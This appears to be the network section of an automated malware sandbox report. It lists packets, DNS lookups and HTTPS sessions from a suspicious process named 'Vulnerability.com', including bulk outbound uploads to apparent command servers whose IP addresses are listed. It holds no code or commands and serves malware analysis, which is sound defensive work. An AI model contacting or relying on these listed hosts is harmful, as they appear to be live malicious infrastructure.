Jan 10, 2025 23:28:44.904978037 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:44.905205011 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:44.905253887 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.269551992 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.269634008 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.269726992 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.270287991 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.270306110 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.728360891 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.728518963 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.730313063 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.730326891 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.730531931 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.732289076 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.733016014 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.733048916 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.733179092 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.733208895 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.733330965 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.733367920 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.733505964 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.733535051 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.733690023 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.733721972 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.733867884 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.733896017 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.733906031 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.733918905 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.734065056 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.734091043 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.734117985 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.734266043 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.734293938 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.743093967 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.743253946 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.743273973 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:45.743294001 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.743335962 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.743362904 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:45.748683929 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.327037096 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.327305079 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.327439070 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.327518940 CET | 49989 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.327549934 CET | 443 | 49989 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.329394102 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.329490900 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.329710007 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.330074072 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.330107927 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.789151907 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.789237976 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.790474892 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.790501118 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.790801048 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:47.791882992 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.791923046 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:47.791966915 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:48.270937920 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:48.271150112 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:48.271334887 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:48.271610022 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:48.271651030 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:48.271686077 CET | 49990 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:48.271703959 CET | 443 | 49990 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:48.376025915 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:48.376069069 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:48.376132011 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:48.376446009 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:48.376462936 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:49.140024900 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:49.140141010 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:49.141525030 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:49.141539097 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:49.141801119 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:49.142853022 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:49.183341026 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:49.404067993 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:49.404310942 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:49.404474974 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:49.404474974 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:49.404474974 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:49.498045921 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:49.498131037 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:49.498222113 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:49.498538017 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:49.498559952 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:49.715934038 CET | 49991 | 443 | 192.168.2.5 | 185.161.251.21 |
Jan 10, 2025 23:28:49.716006041 CET | 443 | 49991 | 185.161.251.21 | 192.168.2.5 |
Jan 10, 2025 23:28:49.971004009 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:49.971103907 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.002064943 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.002139091 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.003194094 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.004635096 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.047323942 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.188575029 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.188724041 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.188843012 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.188874006 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.189038038 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.189099073 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.189112902 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.189268112 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.189321041 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.189331055 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.189479113 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.189532042 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.189543009 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.193401098 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.193473101 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.193484068 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.247159958 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.247179031 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.274808884 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.274883032 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.274889946 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.274914026 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.274961948 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.275126934 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.275137901 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Jan 10, 2025 23:28:50.275178909 CET | 49992 | 443 | 192.168.2.5 | 172.67.162.153 |
Jan 10, 2025 23:28:50.275183916 CET | 443 | 49992 | 172.67.162.153 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 10, 2025 23:27:25.718488932 CET | 63231 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:27:25.726425886 CET | 53 | 63231 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.547496080 CET | 50640 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.557434082 CET | 53 | 50640 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.558871984 CET | 50381 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.569205999 CET | 53 | 50381 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.575154066 CET | 61126 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.583894014 CET | 53 | 61126 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.585263968 CET | 63819 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.593931913 CET | 53 | 63819 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.597572088 CET | 65405 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.606376886 CET | 53 | 65405 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.608592033 CET | 56069 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.617343903 CET | 53 | 56069 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.619601011 CET | 60134 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.628282070 CET | 53 | 60134 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.630578995 CET | 53020 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.638972998 CET | 53 | 53020 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.641208887 CET | 59614 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.650257111 CET | 53 | 59614 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:03.652426004 CET | 61256 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:03.659014940 CET | 53 | 61256 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:05.019104958 CET | 60007 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:05.029807091 CET | 53 | 60007 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:48.272945881 CET | 54510 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:48.375154972 CET | 53 | 54510 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:49.483751059 CET | 50535 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:49.496438026 CET | 53 | 50535 | 1.1.1.1 | 192.168.2.5 |
Jan 10, 2025 23:28:50.259164095 CET | 58368 | 53 | 192.168.2.5 | 1.1.1.1 |
Jan 10, 2025 23:28:50.268039942 CET | 53 | 58368 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 10, 2025 23:27:25.718488932 CET | 192.168.2.5 | 1.1.1.1 | 0xf68b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.547496080 CET | 192.168.2.5 | 1.1.1.1 | 0x1b5d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.558871984 CET | 192.168.2.5 | 1.1.1.1 | 0x2a8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.575154066 CET | 192.168.2.5 | 1.1.1.1 | 0x9bf2 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.585263968 CET | 192.168.2.5 | 1.1.1.1 | 0xfc11 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.597572088 CET | 192.168.2.5 | 1.1.1.1 | 0x8027 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.608592033 CET | 192.168.2.5 | 1.1.1.1 | 0xa9fe | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.619601011 CET | 192.168.2.5 | 1.1.1.1 | 0x5242 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.630578995 CET | 192.168.2.5 | 1.1.1.1 | 0xa76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.641208887 CET | 192.168.2.5 | 1.1.1.1 | 0xbf47 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.652426004 CET | 192.168.2.5 | 1.1.1.1 | 0xb94b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:05.019104958 CET | 192.168.2.5 | 1.1.1.1 | 0x3c4e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:48.272945881 CET | 192.168.2.5 | 1.1.1.1 | 0xbea0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:49.483751059 CET | 192.168.2.5 | 1.1.1.1 | 0xec48 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:50.259164095 CET | 192.168.2.5 | 1.1.1.1 | 0x4504 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 10, 2025 23:27:25.726425886 CET | 1.1.1.1 | 192.168.2.5 | 0xf68b | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.557434082 CET | 1.1.1.1 | 192.168.2.5 | 0x1b5d | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.569205999 CET | 1.1.1.1 | 192.168.2.5 | 0x2a8 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.583894014 CET | 1.1.1.1 | 192.168.2.5 | 0x9bf2 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.593931913 CET | 1.1.1.1 | 192.168.2.5 | 0xfc11 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.606376886 CET | 1.1.1.1 | 192.168.2.5 | 0x8027 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.617343903 CET | 1.1.1.1 | 192.168.2.5 | 0xa9fe | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.628282070 CET | 1.1.1.1 | 192.168.2.5 | 0x5242 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.638972998 CET | 1.1.1.1 | 192.168.2.5 | 0xa76d | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.650257111 CET | 1.1.1.1 | 192.168.2.5 | 0xbf47 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:28:03.659014940 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | 104.102.49.254 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:05.029807091 CET | 1.1.1.1 | 192.168.2.5 | 0x3c4e | No error (0) | 104.21.32.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:05.029807091 CET | 1.1.1.1 | 192.168.2.5 | 0x3c4e | No error (0) | 104.21.112.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:05.029807091 CET | 1.1.1.1 | 192.168.2.5 | 0x3c4e | No error (0) | 104.21.96.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:05.029807091 CET | 1.1.1.1 | 192.168.2.5 | 0x3c4e | No error (0) | 104.21.80.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:05.029807091 CET | 1.1.1.1 | 192.168.2.5 | 0x3c4e | No error (0) | 104.21.48.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:05.029807091 CET | 1.1.1.1 | 192.168.2.5 | 0x3c4e | No error (0) | 104.21.64.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:05.029807091 CET | 1.1.1.1 | 192.168.2.5 | 0x3c4e | No error (0) | 104.21.16.1 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:48.375154972 CET | 1.1.1.1 | 192.168.2.5 | 0xbea0 | No error (0) | 185.161.251.21 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:49.496438026 CET | 1.1.1.1 | 192.168.2.5 | 0xec48 | No error (0) | 172.67.162.153 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:49.496438026 CET | 1.1.1.1 | 192.168.2.5 | 0xec48 | No error (0) | 104.21.15.122 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:28:50.268039942 CET | 1.1.1.1 | 192.168.2.5 | 0x4504 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49871 | 104.102.49.254 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:04 UTC | 219 | OUT | |
2025-01-10 22:28:04 UTC | 1905 | IN | |
2025-01-10 22:28:04 UTC | 14479 | IN | |
2025-01-10 22:28:04 UTC | 16384 | IN | |
2025-01-10 22:28:05 UTC | 3768 | IN | |
2025-01-10 22:28:05 UTC | 495 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49882 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:05 UTC | 263 | OUT | |
2025-01-10 22:28:05 UTC | 8 | OUT | |
2025-01-10 22:28:17 UTC | 1129 | IN | |
2025-01-10 22:28:17 UTC | 7 | IN | |
2025-01-10 22:28:17 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.5 | 49962 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:17 UTC | 264 | OUT | |
2025-01-10 22:28:17 UTC | 78 | OUT | |
2025-01-10 22:28:18 UTC | 1121 | IN | |
2025-01-10 22:28:18 UTC | 248 | IN | |
2025-01-10 22:28:18 UTC | 1369 | IN | |
2025-01-10 22:28:18 UTC | 1369 | IN | |
2025-01-10 22:28:18 UTC | 1369 | IN | |
2025-01-10 22:28:18 UTC | 1369 | IN | |
2025-01-10 22:28:18 UTC | 1369 | IN | |
2025-01-10 22:28:18 UTC | 260 | IN | |
2025-01-10 22:28:18 UTC | 1369 | IN | |
2025-01-10 22:28:18 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.5 | 49970 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:18 UTC | 283 | OUT | |
2025-01-10 22:28:18 UTC | 12840 | OUT | |
2025-01-10 22:28:19 UTC | 1126 | IN | |
2025-01-10 22:28:19 UTC | 20 | IN | |
2025-01-10 22:28:19 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.5 | 49978 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:19 UTC | 275 | OUT | |
2025-01-10 22:28:19 UTC | 15034 | OUT | |
2025-01-10 22:28:20 UTC | 1122 | IN | |
2025-01-10 22:28:20 UTC | 20 | IN | |
2025-01-10 22:28:20 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.5 | 49985 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:20 UTC | 281 | OUT | |
2025-01-10 22:28:20 UTC | 15331 | OUT | |
2025-01-10 22:28:20 UTC | 5229 | OUT | |
2025-01-10 22:28:41 UTC | 1122 | IN | |
2025-01-10 22:28:41 UTC | 20 | IN | |
2025-01-10 22:28:41 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.5 | 49987 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:41 UTC | 277 | OUT | |
2025-01-10 22:28:41 UTC | 5457 | OUT | |
2025-01-10 22:28:42 UTC | 1127 | IN | |
2025-01-10 22:28:42 UTC | 20 | IN | |
2025-01-10 22:28:42 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.5 | 49988 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:42 UTC | 275 | OUT | |
2025-01-10 22:28:42 UTC | 918 | OUT | |
2025-01-10 22:28:44 UTC | 1123 | IN | |
2025-01-10 22:28:44 UTC | 20 | IN | |
2025-01-10 22:28:44 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.5 | 49989 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:45 UTC | 280 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:45 UTC | 15331 | OUT | |
2025-01-10 22:28:47 UTC | 1133 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.5 | 49990 | 104.21.32.1 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:47 UTC | 265 | OUT | |
2025-01-10 22:28:47 UTC | 113 | OUT | |
2025-01-10 22:28:48 UTC | 1126 | IN | |
2025-01-10 22:28:48 UTC | 218 | IN | |
2025-01-10 22:28:48 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.5 | 49991 | 185.161.251.21 | 443 | 2316 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 22:28:49 UTC | 201 | OUT | |
2025-01-10 22:28:49 UTC | 249 | IN | |
2025-01-10 22:28:49 UTC | 329 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
